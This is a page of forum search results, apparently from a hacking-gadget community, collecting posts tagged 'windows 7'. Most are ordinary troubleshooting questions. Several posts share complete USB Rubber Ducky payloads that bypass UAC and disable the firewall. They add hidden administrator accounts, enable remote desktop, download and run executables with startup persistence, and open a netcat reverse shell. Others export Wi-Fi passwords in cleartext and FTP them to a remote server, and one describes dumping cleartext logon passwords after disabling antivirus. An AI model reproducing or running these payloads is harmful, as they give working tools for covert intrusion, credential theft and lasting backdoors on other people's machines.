Search the Community
Showing results for tags 'windows 7'.
Found 23 results
-
How do i use cheat engine? I've wondering, when i want to use it on a game it throws out and exe error. I think its because the game's security is too strong. Anyone able to help me with this?
-
When I open a file for a game... There is some hidden one's that I can't see with the folder open. But through cmd there are things I can see in cmd but can't see in folders.
-
I just got my new Ducky today but I'm getting no love with anything else but Hello World :( The problem seems to be the UAC security. I'm using Windows 7. The command ALT y does not work. It's not a delay issue, I played with that to all extents. It seems to be a focus problem where the ALT y is being sent to another window as the UAC Window does not have focus when it pops up. Am I the only one with this issue? Is there a reliable work around to bring focus to a specific window or anther fix? Without being able to get passed the UAC check, the Ducky would be rather Sucky. No offense, it's a cool gadget, I couldn't stop the rhyme! Thanks Steve
-
Hey y'all, any suggestions on how to get device drivers to load on Windows 7 for the CDC Serial? I've tried re-scanning and keep getting the same result. I've verified that my Device Installation Settings are set to "Download Drivers from Windows Update if not found Locally".
-
My bashbunny does not show a device in Win7 and the devmgr shows under "other devices" a "RNDIS" entry with the yellow exclamation symbol indicating driver failure. Trying to point it to the bunny as suggested for the similar problem for CDC Serial driver issues does not help. I followed the steps here as far as i could: http://wiki.bashbunny.com/?_escaped_fragment_=././index.md%23Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows#!././index.md%23Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows I've not had any success installing tools, connecting to internet, or anything else so far. It's been a pretty big let down for a first day. Any guidance is appreciated!
-
Alright, so I purchased rubber ducky a few weeks ago. Since I received the package I been trying simple payloads but it never works for me. Part of the problems is that every time I plug in the USB, the target machine (Windows10 or Windows7 no security software) behaves as if I'm pressing ctrl+alt+del. If I don't touch anything and lets says they are a couple of tab keystrokes on the payload. I can see the machine tabbing through the ctrl+alt+del screen menu. Which leads me to believe the USB is recognized and somewhat functioning. But it doesn't matter what I use for the first line of the payload. It can be GUI r or Controls Escape the behavior is always the same. REM open cmd DELAY 3000 GUI r DELAY 300 STRING cmd DELAY 100 ENTER
-
long story short: I had a box at work get compromised at and I pulled it off the network then initiated a forensic investigation. When the vendor came back with the report one section showed a memory dump of all the accounts on the box. All except one account showed their passwords encrypted, that last account showed the password in clear text in memory. What can I start looking up to understand how or why this would happen? I figured this would be a good place to ask this question. The PC is windows 7 and the account that had it's PW in clear text in the memory dump was domain admin.
-
Rough day Had to move profiles from windows 7 to windows 10. It took for ever one profile was over 50 gb one 20gb the others were 15 gb. I could only work on one pc at a time. It is an office. I had a network issue to setup updates my connection kept going in and out. When I did a ping I got a general failure. On three new pc's. The easy part was the printer and scanners. I just want to know a faster way to move files this copy files to external hard drive or flash drive is slow. And why am I getting the general failure on the ping. Anyone use a crossover cable and live Linux cd or usb to move these files.
-
I'm trying to schedule a startup application with schtasks on a Windows 7 box. I get Access Denied. schtasks works without administrator privileges if you are setting it for specfic time of day but not with startup tasks. Is there a tricksy way to schedule startup tasks on Windows 7 and later without being admin?
-
Hi there. Long time viewer of Hak5. (Tried successfully hacking the ZipIt Z2 to run AirCrack) I've recently invested in a Lenovo Thinkpad W510 [intel Quad-core i7 720QM, 4GB RAM, Win7] for my small business. I'm mainly going to be doing online surfing, video conferencing, and word processing. Though my main focus for this post is the online surfing and perhaps the conferencing too. I'm not computer literate. I've dabble lightly in networking, (aka I'm the one who fixes the 'internet' at home) so I know the surface of the malicious threats that can befall someone surfing the net. But my question is this: What sort of extensions for Chrome and perhaps simple programs on Win7 exist out there that can offer me a smidgen of an illusion of a more secure laptop and online experience, from online and wifi threats? You know, so I don't have to reformat every few months, give up sensitive client info, or sacrifice sanity while using my browser. It doesn't need to be a free option, I don't mind paying a developer for a program or system of security worth my time and effort.
-
I found a visual basic script embedded in the C:\Windows\System32 folder of Windows 7 called "GatherNetworkInfo.vbs" When I right clicked on this script with the "edit" option and read the code I thought it was a virus! But it existed on another laptop running Windows 7 Ultimate. (I think it is part of netsh tracing function) Anyway, I copied and pasted this script to my desktop and then opened a command terminal in my Desktop path and ran the strange script with: "wscript GatherNetworkInfo.vbs" and lo-and-behold a folder magically appeared on my Desktop called "config" and inside this folder it listed my admin username, my machine name, intimate details about my network card and settings, details about my router and neighboring routers, my current firewall settings, my installed Microsoft security updates and a plethora of other juicy security details. I think this script can be used to do information gathering during a pen-test and could probably be made to pipe the "config" folder on to a rubber ducky. Anyways I felt the script a little too dangerous to have just sitting there ready to be executed because the info gathered would be all anyone would need to remote access your box especially if one or more security patches were found not to be installed. I deleted this script from my working box for security with a live linux disk but kept a copy of it for my USB Rubber Ducky to use as reconnaissance . The script is completely portable and uses embedded systems such as netsh to gather all its info so I think it is a shoe-in for a pen-testers toolbox.
-
Hi, I just got this rubber ducky. I have watched all the videos and read about a dozen topics and I don't see a single video showing someone dragging and dropping a payload onto the usb and booting it. Not one. But that's exactly what Darren says you can do to get this up and running. I used the generator, put together something- nothing. So, I decided to do a custom script, simple code: DELAY 3000 GUI R DELAY 200 STRING notepad ENTER DELAY 200 STRING Hello World!!! ENTER This should be simple enough? Doesn't require directories or anything. Still nothing. The only thing I haven't done is drop this in using Linux. But why the heck would I have to boot up linux just to drop this inject file on the drive?? What am I missing. Ugh. So frustrated. I've tried it on 2 machines now as well. This should be straight forward. Use generator, create code, drag on sd card. Well- okay, maybe my drive is too large? Is that possible? I moved the binary inject file to a 16GB card? Don't see why that would hurt though. If I'm copying target computer files I want space? And even if I get this up and running, I still have another question. In the generator.. it says "usb name: (ducky)" _______ ? If we're suppose to name it ducky to go along with various pre-written code.. why would it ask the question? And, is the answer just written in normal format or is it like, "/ducky", does lower-case matter, etc? Because at first when I did a more complicated script I thought this was going to be the problem. Heeeelp! Thanks, Morgan
-
Can you take a Mark 5 pineapple out of the box and plug and play with a Windows 7 box or do you need to run a virtual machine on the Windows box first. I ask as VM machine scares the hell out of me. Full cred to those very kind souls who help answer and fix this and other problems. I don't know if they go by a handle. They check in on the new stuff posted page at the Hak5 Forum each day where they find the new stuff...easy stuff,(like mine and hard stuff like, What is the answer............... forty ummm?)sniff over your problem and we the end user expect the world and they expect nothing for just helping. A rant, sorry to all. Ps. One smart trick to problem solving is give as much info as you can ( no book writing). And check the forum first to see if some problem like yours has already been fixed. Enough said, and I'll be the first to be told that my request is in the Forum :-/ all good fun. many thanks for taking the time to read this :-D -
This is a simple modification to the powershell reverse payload w/UAC for Win7 in simple-ducky to make it persistent. All credit goes to Skysploit for this payload! I added the quicker UAC bypass method and edited the location that the EXE is placed for persistence. Verified system privileges after log off and reboots! :D ****************************************************************************************************************************** DELAY 5000 ESCAPE DELAY 400 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 700 ALT Y DELAY 800 ENTER STRING netsh firewall set opmode disable ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f ENTER DELAY 300 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'" ENTER STRING exit ENTER ****************************************************************************************************************************** You MUST use simple-ducky by Skysploit to generate this payload and place the winmgmt.txt file in your webserver location. After you have gone through creating the payload simply delete the created "inject.bin" file and open the "payload.txt" file for editing. Delete all text and paste in the payload code above. Then in terminal type the following 2 commands: cd /usr/share/ducky/encoder (for Kali, if using a different OS then cd to the directory your "encoder.jar" file is in) java -jar encoder.jar -i payload.txt -o inject.bin (now place the "inject.bin" file on your ducky and use as you normally would) -
The following error appears when I try to install Windows7 on my 360GB HD: Setup was unable to create a new system partition or locate an existing system partition. See the Setup log files for more information. I used the diskpart utility to clean the HD, create a partion and format it as ntfs. detail disk shows the following: Vol## ltr labl fs type size Status info 2 C NTFS Partition 335GB Healthy I got Ubuntu12 on the first HD, set to load w/out Grub. I'm trying to set up a dual boot (Ubuntu/Win7) for a friend. The Ubuntu site recommends installing their OS using some kind of wasabi.exe file or some crap. I don't want to re-install the entire OS! Anyone know how to force the Win7 setup app to detect the new partition/drive through the cmdline or where the setup logs is stored? I even let clean all run overnight - no errors. -
Hi guys, I am experiencing strange behaviors in my pineapple. Its all started when my RP-SMA to U.FL cable broke (already noticed the forum that I am not the first one). So as i have knowledge of electronics, i opened my pineapple and did a little repair in the cable, the signal was not 100% but was 81%. And i was waiting to buy a new connector tomorrow. The problem is that when I tested the pineapple to see if everything was okay, it began to reset itself. I did some reboots on my computer and pineapple stabilized. But now I cant provide internet through the pineapple, I also access the interface on the GUI page and start all services except starturlsnarf, if i start urlsnarf pineapples reboots again. I dont have internet on GUI also, I tried to do a fresh install of the firmware to see if i get this fixed but always appears this message: I have internet on my pc, I can access other pages but the pineapple keep saying that i dont have internet connection ... damn lucky. This is my configuration: My questions: 1 - how do I install a new firmware to fix this sittuation without internet on GUI? 2 - Do you think the firmware update will fix this issues? (already have 2.8.0 version) 3 - Do you think the problem is in RP-SMA to U.FL cable? (i dont think so, as i have 81% signal) I apreciate some help, thanks
-
Hello, Here's a new payload that I came up with. It targets Windows 7 w/UAC enabled. Here's what happens when you run it... Opens an admin command prompt Creates an admin user (default creds: hacker | mysecretpassword) Disables the windows firewall Enables remote desktop Enables remote assistance Hides the newly created admin account from the Windows Welcome Screen Creates a VBScript to run a hidden instance of Netcat Creates a batch file to launch Netcat (this is needed to mask an open netcat session from the desktop) Downloads netcat from the attackers web server (to transfer netcat to the web directory in kali use: cp /usr/share/windows-binaries/nc.exe /var/www/nc.exe)(launch apache by using: service apache2 start) Calls the VBScript to launch the hidden netcat shell Creates a batch file in the startup directory that will launch the VBScript every time a user logs in (the batch file is hidden/transparent to the user while it runs) So here it is... I will add a fully configurable version of ~Persistence~ to the Simple-Ducky Payload Generator this weekend. ~skysploit DELAY 5000 ESCAPE DELAY 300 CONTROL ESCAPE DELAY 300 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW DELAY 300 ENTER DELAY 800 STRING netsh firewall set opmode disable ENTER DELAY 300 STRING net user hacker mysecretpassword /add && net localgroup administrators hacker /add ENTER DELAY 200 STRING y ENTER DELAY 400 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING copy con nc.vbs ENTER STRING Set WshShell = CreateObject("WScript.Shell") ENTER STRING WshShell.Run chr(34) & "c:\Windows\System32\nc.bat" & Chr(34), 0, false ENTER STRING Set WshShell = Nothing ENTER CTRL z ENTER STRING echo cmdow @ /hid >> nc.bat ENTER STRING echo nc -nv 172.16.1.5 4444 -e cmd.exe >> nc.bat ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http://172.16.1.5/nc.exe,c:\Windows\system32\nc.exe'); ENTER STRING cscript nc.vbs ENTER STRING cd c:\Documents And Settings\All Users\Start Menu\Programs\Startup\ ENTER STRING echo cmdow @ /hid >> persistence.bat ENTER STRING echo cscript c:\Windows\System32\nc.vbs >> persistence.bat ENTER STRING exit ENTER
-
OK rebuild of my first script. It would not export cleartext passwords without administrator access, and the firewall was also giving me fits. sooooooo. the first ctrl-shift enter gets a cmd shell with administrative access (you need to compile with version 2.2 of duck encoder - props to Dnucna). the first string then disables the firewall, then the rest of the code works fine. You may want to tweek the delay after the ftp session depending on upload speed.....enjoy Please let me know if you have ideas for additions/improvements. DELAY 2000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 STRING netsh firewall set opmode mode=disable ENTER DELAY 400 STRING netsh wlan export profile key=clear ENTER DELAY 400 STRING cd %USERPROFILE% ENTER DELAY 400 STRING ftp -i ftp server ENTER DELAY 400 STRING username ENTER DELAY 400 STRING password ENTER DELAY 600 STRING prompt ENTER DELAY 400 STRING prompt ENTER DELAY 400 STRING MPUT *.xml ENTER DELAY 4000 STRING bye ENTER DELAY 400 STRING del *.xml ENTER DELAY 200 STRING netsh firewall set opmode mode=enable ENTER DELAY 400 ALT SPACE STRING c
-
OK all...Script for turning off the firewall, adding a user, making it an administrator, enabling remote access and sending (by FTP) the IP number to a server of your choice, then deleting the file. I am thinking something like netcat in the unix world? As always, Ideas? DELAY 2000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 ALT y ENTER DELAY 400 STRING netsh firewall set opmode mode=disable ENTER DELAY 400 STRING net user /add username password ENTER DELAY 400 STRING net localgroup administrators username /add ENTER DELAY 400 STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f ENTER DELAY 400 STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f ENTER DELAY 400 STRING sc config TermService start= auto ENTER DELAY 400 STRING net start Termservice ENTER DELAY 400 STRING cd %USERPROFILE% ENTER DELAY 400 STRING ipconfig /all > number.txt ENTER DELAY 400 STRING ftp -i ftp server ENTER DELAY 400 STRING login name ENTER DELAY 400 STRING login password ENTER DELAY 600 STRING prompt ENTER DELAY 400 STRING prompt ENTER DELAY 400 STRING PUT number.txt ENTER DELAY 2000 STRING bye ENTER DELAY 400 STRING del number.txt ENTER DELAY 400 ALT SPACE STRING c
-
For windows 7....This script will export the wifi settings then send to an ftp server of your choice. the cool part is that the security is exported in clear text. For pentesting this is fantastic. After sending the file it will delete the exports from the sending directory. Thoughts? I know I can play with the delays a bit, but works in under a minute. DELAY 2000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd ENTER DELAY 400 STRING netsh wlan export profile key=clear ENTER DELAY 400 STRING cd %USERPROFILE% ENTER DELAY 400 STRING ftp -i FTPSERVER ENTER DELAY 400 STRING LOGIN NAME ENTER DELAY 400 STRING LOGIN PASSWORD ENTER DELAY 600 STRING prompt ENTER DELAY 400 STRING prompt ENTER DELAY 400 STRING MPUT *.xml ENTER DELAY 2000 STRING bye ENTER DELAY 400 STRING del *.xml ENTER DELAY 200 ALT SPACE STRING c
-
Hi Folks, I wanted to share a new script I developed that shows a proof of concept for a rubber ducky and Windows Credential Editor (WCE) script that would would do the following: 1.) Disable Antivirus for 15 minutes which is default. (This must be done to avoid signiture detection of WCE executable) 2.) FTP to attacker machine on the network, downloading the 32-bit & 64-bit version of WCE 3.) Script then executes both versions, sending the output to a text file with the computer name as the variable of the file name. Note: One executable will fail (64 or 32 bit), but it will not write to the output file. 4.) Script will then upload the file containing cleartext passwords for users logged in based on LSASS memory 5.) The script will then remove all WCE executables as well the cleartext password file created before the antivirus program automatically start. Then closes all appropriate windows The video demo can be found at: http://youtu.be/IqUci4buvvM Below is a copy of the script. Note: This is a proof of concept and will need to be tweaked per environment and penetration testing engagement. ---------------------------------------------------------------------------------------------------------------------------------------------- code below: ------------------------------------------------------------------------------------------------------------------------ -
Automatically create and connect to an Ad-hoc network, Win 7
baitNswitch posted a topic in Questions
I have been trying to figure out a way to get several of my Win 7 laptops to be able to automatically create / initialize an ad-hoc network when they boot up, or connect to the already initialized ad-hoc network if it is present. I want all of the computers to automatically connect to each other. Think 5 robots coming online and about to interact with each other, with no AP, or Router nearby. I have been working with netsh commands and setupSNK.exe, but no joy. It seems Windows blocked all the automatic connections for ad-hoc networks due to some security concerns. Does any one know of a way to get Windows to allow an automatic connection of this type? -
Well, I downloaded the Linux OS called Backtrack and installed it on my Compaq Computer Hardrive, it decided to take over my whole computer. Now I can't get back into windows. My friend is a programmer and he took a look at it, apparently the ghost of my old OS is still installed waiting to be resurrected. The thing is, I don't know any Linux code and I have no money to buy a new OS. Is there anything I can do with Linux to resurrect my Windows 7?
